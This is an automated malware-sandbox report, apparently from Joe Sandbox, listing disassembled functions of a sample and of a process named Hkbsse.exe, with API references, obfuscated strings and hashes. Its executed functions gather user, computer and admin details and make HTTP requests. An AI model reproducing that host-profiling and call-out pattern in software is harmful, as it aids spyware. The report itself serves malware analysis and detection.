Function 004316A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431701
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0043174C

Strings

pContext, xrefs: 00431744

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 4da4eb47fe9049000f3abc222d2d88a91e1d3407e05b2ecadb438d1b46403cb8
Instruction ID: e8372e5c3857559724493f564ebdcf25c002e3273548e261dc29e8e0fa387a9b
Opcode Fuzzy Hash: 4da4eb47fe9049000f3abc222d2d88a91e1d3407e05b2ecadb438d1b46403cb8
Instruction Fuzzy Hash: 4211063AA00214ABCB15BF65C89566D77A5AF88364F18506BE80297362DB38DD02CBD8

Function 0041D384 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0040247E

Part of subcall function 00433AA1: RaiseException.KERNEL32(E06D7363,00000001,00000003,0045E408,?,?,?,0045E408), ref: 00433B01

Strings

P#@, xrefs: 0040246D
P#@, xrefs: 00402486

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: P#@$P#@
API String ID: 3109751735-3974838576
Opcode ID: 8bf1d139e5a309b91fc3080591908df1bf370afd3c1e5ca165040ee8d4b7c38b
Instruction ID: 8293948e840814269afb88a9cd9c574164d73c89adce1ae53d0bb2c6bf131356
Opcode Fuzzy Hash: 8bf1d139e5a309b91fc3080591908df1bf370afd3c1e5ca165040ee8d4b7c38b
Instruction Fuzzy Hash: D7012B7590030D7BCB14BEA5EC05989B36C9E04318F10463BFD14A6581FB78E694C6DE

Function 0041CF91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041D1BC
___raise_securityfailure.LIBCMT ref: 0041D2A3

Strings

@WF, xrefs: 0041D29E

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @WF
API String ID: 3761405300-3852368868
Opcode ID: 29a4184ebb1f704d635f8970d7554562ad1d14f4f2e208cd1edb2c978123c02e
Instruction ID: 2cc50ecead36f84fed22d35a3d9ff63b4f8f6caf31b5857ec7ae496c67213c4e
Opcode Fuzzy Hash: 29a4184ebb1f704d635f8970d7554562ad1d14f4f2e208cd1edb2c978123c02e
Instruction Fuzzy Hash: 3021BDB4510B00EAD720EF55F9866543BE4FB48314F50513AEA088BAB1F3F459A5CF8E

Function 00419660 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

Strings

P#@, xrefs: 0040342D
P#@, xrefs: 00403446

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID: P#@$P#@
API String ID: 1418687624-3974838576
Opcode ID: 08712eda158f23e6b5a9b752bd9dc1fa8aa5796f6dbb19ae78a785a3a74b1eb5
Instruction ID: eef388659c7a0f9252b5e042681c33ff08c8fd6e8d8a3bca4e250cd213e5fa33
Opcode Fuzzy Hash: 08712eda158f23e6b5a9b752bd9dc1fa8aa5796f6dbb19ae78a785a3a74b1eb5
Instruction Fuzzy Hash: 1001D83560020877C718FF95D801E9B7B9C9F44719B10447FF945A7642EF74AA44879D

Function 0043A65E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A6AE
_free.LIBCMT ref: 0043A6E2

Strings

x!F, xrefs: 0043A6D5

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free
String ID: x!F
API String ID: 269201875-3062043068
Opcode ID: 4f7974bffc2e86844ac89627fc953affbc48d1241aea1bfa6a4d8ee04079c6e4
Instruction ID: 8c8d9416c712e26177bbd7fe74d822bcc54e4b1b9b293b2ddf0e0ac058583908
Opcode Fuzzy Hash: 4f7974bffc2e86844ac89627fc953affbc48d1241aea1bfa6a4d8ee04079c6e4
Instruction Fuzzy Hash: 4801D431985A317AD52132355C03BAF22089B0D778F18322BFEE0A52E5FB9D8C6245DF

Function 0214A8C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0214A915
_free.LIBCMT ref: 0214A949

Strings

x!F, xrefs: 0214A93C

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free
String ID: x!F
API String ID: 269201875-3062043068
Opcode ID: 4f7974bffc2e86844ac89627fc953affbc48d1241aea1bfa6a4d8ee04079c6e4
Instruction ID: 13cf71d43a6f2f7ced8c7877fcc5fd0b0acb964a94787b72aab5892addfe9779
Opcode Fuzzy Hash: 4f7974bffc2e86844ac89627fc953affbc48d1241aea1bfa6a4d8ee04079c6e4
Instruction Fuzzy Hash: D601D8329C9A217ED62136749C21B7E52099F02738F170325FA6CA90E0EF51C9038AD5

Function 004199B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__Cnd_destroy_in_situ.LIBCPMT ref: 004199FB
__Mtx_destroy_in_situ.LIBCPMT ref: 00419A04

Strings

pzA, xrefs: 004199DD

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situ
String ID: pzA
API String ID: 1432671424-2142982456
Opcode ID: e9b4f08a9a206f3ccc14da9b614286118c03634d90d0b9441c59f0694765e3dd
Instruction ID: 744c0bf981315cc90bb016ed8ecf99df3b9ecd0f1ea1aae7e6a2a60bc43798bd
Opcode Fuzzy Hash: e9b4f08a9a206f3ccc14da9b614286118c03634d90d0b9441c59f0694765e3dd
Instruction Fuzzy Hash: 44F0C2B29007009BCB20DF70E488B9BB3E8AF44304F04091FE686C7601D738E9C8C795

Function 00402440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00433AA1: RaiseException.KERNEL32(E06D7363,00000001,00000003,0045E408,?,?,?,0045E408), ref: 00433B01

___std_exception_copy.LIBVCRUNTIME ref: 0040247E

Strings

P#@, xrefs: 0040246D
P#@, xrefs: 00402486

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: P#@$P#@
API String ID: 3109751735-3974838576
Opcode ID: fade4319ee8f01287b0cef8d04cd72f6e74ef2c899f21dd2e30cab444ddac5b3
Instruction ID: b20eb5a5b88c3717300c8379e309be929e7f674d1fae793633624c4917cafdcc
Opcode Fuzzy Hash: fade4319ee8f01287b0cef8d04cd72f6e74ef2c899f21dd2e30cab444ddac5b3
Instruction Fuzzy Hash: BEF0A07681020C67C714EEE5E801986B3ACDA15705B108A2BFA40A7501F7B8FA488799

Function 00403400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00402AF0: ___std_exception_copy.LIBVCRUNTIME ref: 00402B23

Part of subcall function 00433AA1: RaiseException.KERNEL32(E06D7363,00000001,00000003,0045E408,?,?,?,0045E408), ref: 00433B01

___std_exception_copy.LIBVCRUNTIME ref: 0040343E

Strings

P#@, xrefs: 0040342D
P#@, xrefs: 00403446

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy$ExceptionRaise
String ID: P#@$P#@
API String ID: 2103344913-3974838576
Opcode ID: 61ffcc987824450277517456b7a659a6427d484492d5cd45eef8d8ba28feea55
Instruction ID: 631fce6d2d8f10fcfe0038404017ece80fd698ca1e979846b1fb53c9ad96ee22
Opcode Fuzzy Hash: 61ffcc987824450277517456b7a659a6427d484492d5cd45eef8d8ba28feea55
Instruction Fuzzy Hash: A7F0A07691020C77C714FFE9DC01986B7AC9E08705B10892BFA50A7602FBB4E6488BA9

Function 00417B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__Mtx_destroy_in_situ.LIBCPMT ref: 00417BB6
__Cnd_destroy_in_situ.LIBCPMT ref: 00417BBF

Strings

@.@, xrefs: 00417BAF

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situ
String ID: @.@
API String ID: 1432671424-4060093550
Opcode ID: aa40da97a5e6d1564b5ed610ac3ee27ab0a498fda6cd8c90ae17ae10c021185c
Instruction ID: 1ba7b99922c46ab005e81017a45aa24a91ce58d08e1b3b45ffef2f34b8953150
Opcode Fuzzy Hash: aa40da97a5e6d1564b5ed610ac3ee27ab0a498fda6cd8c90ae17ae10c021185c
Instruction Fuzzy Hash: 6EF0E270A052044BC711AB68CC44A86BBE8AF0132DB14892FF94887791EB79E88487D8

Function 00402520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00402552

Strings

P#@, xrefs: 00402547
P#@, xrefs: 0040255D

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#@$P#@
API String ID: 2659868963-3974838576
Opcode ID: 3098a5abb4a430e8c046baabfb0c04881eb0a2bcf26c109f2e7b1c6565ea2582
Instruction ID: 8ab1ead64319f94712381e01b4aadf11cded658978a0eec3110c4f74897e1d72
Opcode Fuzzy Hash: 3098a5abb4a430e8c046baabfb0c04881eb0a2bcf26c109f2e7b1c6565ea2582
Instruction Fuzzy Hash: 91F0A771D1020CABCB14DFA8D8419CEBBF8AF59304F10C6AFF84467201EB745A58CB99

Function 0212D31A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00465720), ref: 0212D325
RtlLeaveCriticalSection.NTDLL(00465720), ref: 0212D362

Strings

WF, xrefs: 0212D31F

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: WF
API String ID: 3168844106-2907287748
Opcode ID: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
Instruction ID: 85378ae4faed48c813e5806b35b0728bcbd7ed09d9181941d27f6c4e7782bef5
Opcode Fuzzy Hash: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
Instruction Fuzzy Hash: B9F02738940610DFC3145F18FE44A2A77A4FB85731F10023DF965876E0D7301852CA56

Function 0042B8CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042B8EE
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B901

Strings

pContext, xrefs: 0042B8F9

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 7d7b87e3682e3a1f6e6cbf37db70c2b7e32d7543d5614dce0fffa2efe9d3da3d
Instruction ID: 714fdd923bef3110eb9fcf5b0bba2cd920ca87da3b1a3f45cf26c78d14940368
Opcode Fuzzy Hash: 7d7b87e3682e3a1f6e6cbf37db70c2b7e32d7543d5614dce0fffa2efe9d3da3d
Instruction Fuzzy Hash: D2E02B39F4020867CB04B7A6E805D5D776D9EC4725750401BE90193251DB78DA0486D8

Function 0042346C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042349C

Strings

pScheduler, xrefs: 00423494
version, xrefs: 00423481

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: a7d753484159104edb4940f68b0b386d419656d7fc06efcb7c8474fd09ded0f6
Instruction ID: 4917f07ffd373096695f326ec19bd89fd9a8f53457094722cb687b93330f19d0
Opcode Fuzzy Hash: a7d753484159104edb4940f68b0b386d419656d7fc06efcb7c8474fd09ded0f6
Instruction Fuzzy Hash: A9E04F34680208B6CB25FE56E80ABCD77789B1430EF90C15BB8051119297FC9788CA8D

Function 02132551 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 021324FC
Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 02132512

Part of subcall function 02132A39: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 02132A48
Part of subcall function 02132A39: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 02132A5C
Part of subcall function 02132A39: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 02132A7D
Part of subcall function 02132A39: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02132AE6
Part of subcall function 02132A39: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02132C54

Strings

@[F, xrefs: 0213250A

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
String ID: @[F
API String ID: 3302332639-1227568360
Opcode ID: 08faf06a7c6f408d1ec28e98f8d504dc4d96ef49664ff1e04ac04630f0c929db
Instruction ID: 8a3ef35fc741918c4624551f0d88b4c5d20cee76f089de2acf7f714056d92aac
Opcode Fuzzy Hash: 08faf06a7c6f408d1ec28e98f8d504dc4d96ef49664ff1e04ac04630f0c929db
Instruction Fuzzy Hash: 34E04F71780612DBDB35FFE5F97475973AAEB04704F404129E6448F240E7F4D9048B0A

Function 004024A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004024BE

Strings

P#@, xrefs: 004024AD
P#@, xrefs: 004024C6

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#@$P#@
API String ID: 2659868963-3974838576
Opcode ID: 935341e7c896eaab84a17bb68f1bb2dcfbcd899ec3bee088e06fae5cbe6bcff5
Instruction ID: a93222f481a6019ed4d8fa60bd7b225b6999ca82aecbe3f19b40470c2db33733
Opcode Fuzzy Hash: 935341e7c896eaab84a17bb68f1bb2dcfbcd899ec3bee088e06fae5cbe6bcff5
Instruction Fuzzy Hash: BCD0127292031967C610DF99D801842B7DC9E19755714C52BF944E7201F774E9948BA8

Function 00402580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0040259E

Strings

P#@, xrefs: 0040258D
P#@, xrefs: 004025A6

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#@$P#@
API String ID: 2659868963-3974838576
Opcode ID: ab940b20c8ed4a98533d3a74a5263d2a66ea42a0145a63cbe993f6b16d60fe77
Instruction ID: 81de4a9180bd6130f8c8d58fcb8d9d47f81d3a28709e16a09cdbb0bc19c0fbf8
Opcode Fuzzy Hash: ab940b20c8ed4a98533d3a74a5263d2a66ea42a0145a63cbe993f6b16d60fe77
Instruction Fuzzy Hash: 17D02B7292030867C710DF99CC00842B7DCDE19715710C92BF944E7201F370E8948BE8

Function 00430B76 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 00430B89

Part of subcall function 0042D84F: Concurrency::details::ContextBase::~ContextBase.LIBCMT ref: 0042D888

Strings

uB, xrefs: 00430B7C
yB, xrefs: 00430B82

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Context$BaseBase::~Concurrency::details::Internal
String ID: uB$yB
API String ID: 1065816584-3405343839
Opcode ID: 4c52e112bee6c542630587af508528d1eb3f2e84d75326b6fff1ba5b1fa88c01
Instruction ID: a92b420076a549f66c390f01a602859c8fa35052ee510a8173a08e5ace22c18d
Opcode Fuzzy Hash: 4c52e112bee6c542630587af508528d1eb3f2e84d75326b6fff1ba5b1fa88c01
Instruction Fuzzy Hash: 10D0A77228832516C3242ACDB502B86BBCC8F0676DF14806FFD4C97282DFF9648482DD

Function 00402E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

__Mtx_destroy_in_situ.LIBCPMT ref: 00402E1D

Part of subcall function 0041C601: GetModuleHandleW.KERNELBASE(?,?,00417AA6,00000010,?,?,?,?,?,?,?,?,004026C2,?,92861014), ref: 0041C61A

__Cnd_destroy_in_situ.LIBCPMT ref: 00402E26

Strings

@.@, xrefs: 00402E16

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situHandleModuleMtx_destroy_in_situ
String ID: @.@
API String ID: 2964185041-4060093550
Opcode ID: 1533269c00169cb59944a0a6672205bf4368373b896c2e44cd59c3cbf1ceb625
Instruction ID: 0beea3d17b15b781a39c1ec41eeb01a3ef9f685cf6ef7b90845f9eaae0360422
Opcode Fuzzy Hash: 1533269c00169cb59944a0a6672205bf4368373b896c2e44cd59c3cbf1ceb625
Instruction Fuzzy Hash: CCD012B68022118BC721EF94A8458C777DCAE143113404D1FF89193615FBB8A9D88BD4

Analysis Process: Hkbsse.exePID: 7108, Parent PID: 3476COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.6%
Signature Coverage:	0%
Total number of Nodes:	604
Total number of Limit Nodes:	16

Executed Functions

Function 00414E20 Relevance: 38.6, APIs: 4, Strings: 17, Instructions: 1838COMMON

Download Yara Rule

APIs

Part of subcall function 004064F0: GetUserNameA.ADVAPI32(?,?), ref: 0040654A
Part of subcall function 004064F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00406590
Part of subcall function 004064F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 0040659D

IsUserAnAdmin.SHELL32 ref: 00414F77
GetUserNameA.ADVAPI32(?,?), ref: 00415007
GetComputerNameExW.KERNEL32(00000002,?,?,?,?), ref: 0041506B
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,?), ref: 00415217

Part of subcall function 004179A0: __Cnd_destroy_in_situ.LIBCPMT ref: 00417A98
Part of subcall function 004179A0: __Mtx_destroy_in_situ.LIBCPMT ref: 00417AA1

Strings

WNI1, xrefs: 0041540E
TM1, xrefs: 00415460
awM1, xrefs: 004153E5
246122658369, xrefs: 00414E8A, 00414E9D, 00414EDF, 00414EE9, 004154E4
Ls4VPO==, xrefs: 004154A9
Xw01, xrefs: 00415393
xY1, xrefs: 00415341
Sc1, xrefs: 0041530D
WNY1, xrefs: 0041536A
Wck1, xrefs: 00415437
bM41, xrefs: 004153BC
`H|, xrefs: 004164C6
3dae01, xrefs: 00415479
a 0=, xrefs: 00416373, 00416642
9MQ1, xrefs: 004154F2
bdM1, xrefs: 004154CB
aSQ1, xrefs: 00415487

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Name$User$AccountAdminAuthorityCnd_destroy_in_situComputerFileIdentifierLookupModuleMtx_destroy_in_situ
String ID: Sc1$ TM1$ xY1$246122658369$3dae01$9MQ1$Ls4VPO==$WNI1$WNY1$Wck1$Xw01$`H|$a 0=$aSQ1$awM1$bM41$bdM1
API String ID: 2186296352-1259864883
Opcode ID: d7fa9c9b880e793ed18f1b27b240a116056d0bd0e57fe5da26bf65fbd320dbdc
Instruction ID: 439fdd8091584e1c1a902e5e7c6afba4dbaf282c3aa69dd6ba4b802a82f436c6
Opcode Fuzzy Hash: d7fa9c9b880e793ed18f1b27b240a116056d0bd0e57fe5da26bf65fbd320dbdc
Instruction Fuzzy Hash: E9F204B19001548BEB29DB28CD897DDBB769F82308F5081DDE048A72C2DB799FC48F59

Function 0040BCA0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 304
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00458DD8,00000000,00000000,00000000,00000000), ref: 0040BD2C
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BD50
HttpOpenRequestA.WININET(?,00000000), ref: 0040BD9A
HttpSendRequestA.WININET(?,00000000), ref: 0040BE5A
InternetReadFile.WININET(?,?,000003FF,?), ref: 0040BF0C
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040BFC0
InternetCloseHandle.WININET(?), ref: 0040BFE7
InternetCloseHandle.WININET(?), ref: 0040BFEF
InternetCloseHandle.WININET(?), ref: 0040BFF7

Strings

stoi argument out of range, xrefs: 0040E34A
Su9OYy==, xrefs: 0040BD73
invalid stoi argument, xrefs: 0040E354
9xRVfBowNz==, xrefs: 0040C22B, 0040C483
`?|, xrefs: 0040C95D, 0040CB38
9xRVfFM7NB4=, xrefs: 0040C2C5

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: 9xRVfBowNz==$9xRVfFM7NB4=$Su9OYy==$`?|$invalid stoi argument$stoi argument out of range
API String ID: 1354133546-3559354798
Opcode ID: 30267c7b843614ec910e77e6bc2546fefb9d39e2d756dc8e2fea084b42f39353
Instruction ID: b97fefc8698cc81c16fae9c1c500eac6390718e910ffa5b7c75f87120b235961
Opcode Fuzzy Hash: 30267c7b843614ec910e77e6bc2546fefb9d39e2d756dc8e2fea084b42f39353
Instruction Fuzzy Hash: 3FB1B2B16001189BEB24CF28CD88BDDBB75EF45304F5042AAF509A72D2D7799AC4CF99

Function 00407C40 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 388
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,B007A738,76230F00,00000000), ref: 00407CBA
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407D1B
GetProcAddress.KERNEL32(00000000), ref: 00407D22
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407DE3
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407DE7

Strings

MOA, xrefs: 00407C4D
0B|, xrefs: 00407CFA
K AtPe==, xrefs: 0040804A
C|, xrefs: 00407F4B, 00407FF3, 0040809B
K AsQe==, xrefs: 004080F2
K AsRO==, xrefs: 00407FA2

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID: 0B|$K AsQe==$K AsRO==$K AtPe==$MOA$C|
API String ID: 374719553-1172323363
Opcode ID: 14c807a3a0139cd875422f88ef81b20bb6fccbb6df46bfbc14d8ac682f71a4ec
Instruction ID: 10caa358f2aa1557ac9ec519d96e2c9e1a3c6fed02cc3ae2ee5dea5c244ef8c3
